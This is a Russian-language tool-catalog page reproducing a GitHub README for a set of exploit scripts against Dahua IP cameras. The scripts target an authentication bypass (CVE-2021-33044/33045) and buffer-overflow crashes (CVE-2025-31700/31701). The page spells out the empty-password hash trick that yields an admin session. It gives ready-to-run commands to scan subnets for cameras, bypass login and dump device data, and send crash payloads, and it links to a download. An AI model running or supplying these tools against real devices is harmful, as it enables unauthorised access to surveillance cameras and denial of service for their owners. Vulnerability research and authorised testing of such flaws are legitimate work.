Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
dahua-cve-research — Набор инструментов для исследования уязвимостей IP-камер Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
Инструменты/GitHubGitHub/umair-aziz025/dahua-cve-research
Безопасность IoTКартирование сетиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
umair-aziz025/dahua-cve-research

dahua-cve-research

Набор инструментов для исследования уязвимостей IP-камер Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701)

Репозиторий
2164 месяцев назадПроверено Kitploit

Инструменты эксплуатации уязвимостей IP-камер Dahua CVE

⚠️ В РАЗРАБОТКЕ — Эти сценарии основаны на опубликованных деталях CVE и требуют дальнейшего тестирования на уязвимых устройствах для подтверждения полной функциональности.

Исследовательские и proof-of-concept скрипты для четырех критических уязвимостей IP-камер Dahua.


⚠️ ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ

root@kitploit:~
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.

Используя эти инструменты, вы соглашаетесь с тем, что:
  1. У вас есть ЯВНОЕ ПИСЬМЕННОЕ РАЗРЕШЕНИЕ на тестирование целевых систем
  2. Вы НЕ будете использовать эти инструменты для незаконной деятельности
  3. Вы принимаете на себя полную ответственность за свои действия
  4. Авторы НЕ несут ответственности за любое неправомерное использование или ущерб

Несанкционированный доступ к компьютерным системам является УГОЛОВНЫМ ПРЕСТУПЛЕНИЕМ в большинстве юрисдикций.

Охваченные CVE

CVE-2021-33044 и CVE-2021-33045 — Обход аутентификации

  • CVSS: 9.8 CRITICAL
  • CWE: CWE-287 (Некорректная аутентификация)
  • Механизм: Вход через RPC2 принимает хэш с пустым паролем, предоставляя доступ администратора
  • Затрагивает: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • Исправлено в: Прошивка 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • Ссылки:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • Каталог CISA KEV

CVE-2025-31700 и CVE-2025-31701 — Переполнение буфера (DoS/RCE)

  • CVSS: 8.1 HIGH
  • CWE: CWE-120 (Копирование в буфер без проверки размера входных данных)
  • Механизм: Пакеты большого размера вызывают переполнение буфера → сбой или потенциальное RCE
  • Ссылки:
    • NVD CVE-2025-31700
    • Бюллетень безопасности Dahua

Как работает обход аутентификации

Камеры Dahua используют аутентификацию по принципу «запрос-ответ» через /RPC2_Login:

root@kitploit:~
Обычный вход:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Обход (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← ПУСТОЙ пароль
  step2 = MD5("step1:random:step1")

Уязвимая прошивка принимает хэш с пустым паролем и возвращает действительный токен сессии.


Скрипты


Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Установка зависимостей
pip install requests

Использование

Сетевой сканер

root@kitploit:~
# Сканирование подсети (необходимы порты)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Один хост с портом
python dahua_scanner.py 192.168.1.100:8081

# Полные опции
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Показать справку
python dahua_scanner.py --help

Типичные порты Dahua: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

Много-CVE эксплойт (рекомендуется)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Один CVE
python dahua_exploit.py --help

Обход аутентификации

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # Сбор информации об устройстве после обхода

Отказ в обслуживании (переполнение буфера)

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # Только HTTP
python dahua_rce.py 192.168.1.100 --cve tcp   # Только TCP/37777

⚠️ ПРЕДУПРЕЖДЕНИЕ: Скрипт DoS может вызвать сбой целевого устройства.


Зависимости

root@kitploit:~
requests

Все остальные импорты из стандартной библиотеки Python: socket, struct, hashlib, threading, ipaddress, argparse, json


Статус разработки

🚧 В АКТИВНОЙ РАЗРАБОТКЕ

Эти сценарии разработаны на основе:

  • Опубликованных деталей CVE из NVD
  • Бюллетеней безопасности Dahua
  • Публичных ссылок PoC (seclists.org, packetstormsecurity)

Статус тестирования:

  • ✅ Логика обхода аутентификации реализована в соответствии со спецификациями CVE
  • ✅ Полезные нагрузки переполнения буфера созданы в соответствии с бюллетенями
  • ⚠️ Ограниченное тестирование на реальных уязвимых устройствах
  • ⚠️ Требуется дополнительная проверка на различных версиях прошивок

Если у вас есть доступ к уязвимым устройствам для тестирования, приветствуются вклады и отзывы.


Участие

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции
  3. Протестируйте свои изменения
  4. Отправьте pull request

Пожалуйста, сообщайте о любых проблемах или ложных срабатываниях.


Ссылки

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • Известные эксплуатируемые уязвимости CISA
  • Центр безопасности Dahua
  • Bashis PoC - Seclists

Лицензия

Лицензия MIT — см. файл LICENSE.


Автор

Umair Aziz
GitHub: @umair-aziz025


Только для образовательных целей и авторизованного исследования безопасности.

Скачать инструмент
CVECVSSТипСтатус
CVE-2021-330449.8 CRITICALОбход аутентификацииCISA KEV (активно эксплуатируется)
CVE-2021-330459.8 CRITICALОбход аутентификацииCISA KEV (активно эксплуатируется)
CVE-2025-317008.1 HIGHОтказ в обслуживании (переполнение буфера)Недавняя (2025)
CVE-2025-317018.1 HIGHОтказ в обслуживании (переполнение буфера)Недавняя (2025)
ФайлНазначениеCVE
dahua_scanner.pyОбнаружение в сети — поиск камер Dahua в подсетиОбнаружение
dahua_exploit.pyМного-CVE сканер — тестирование всех уязвимостейВсе
dahua_auth_bypass.pyВыделенный обход аутентификации с опцией --dumpCVE-2021-33044/45
dahua_rce.pyЗонд отказа в обслуживании (переполнение буфера)CVE-2025-31700/01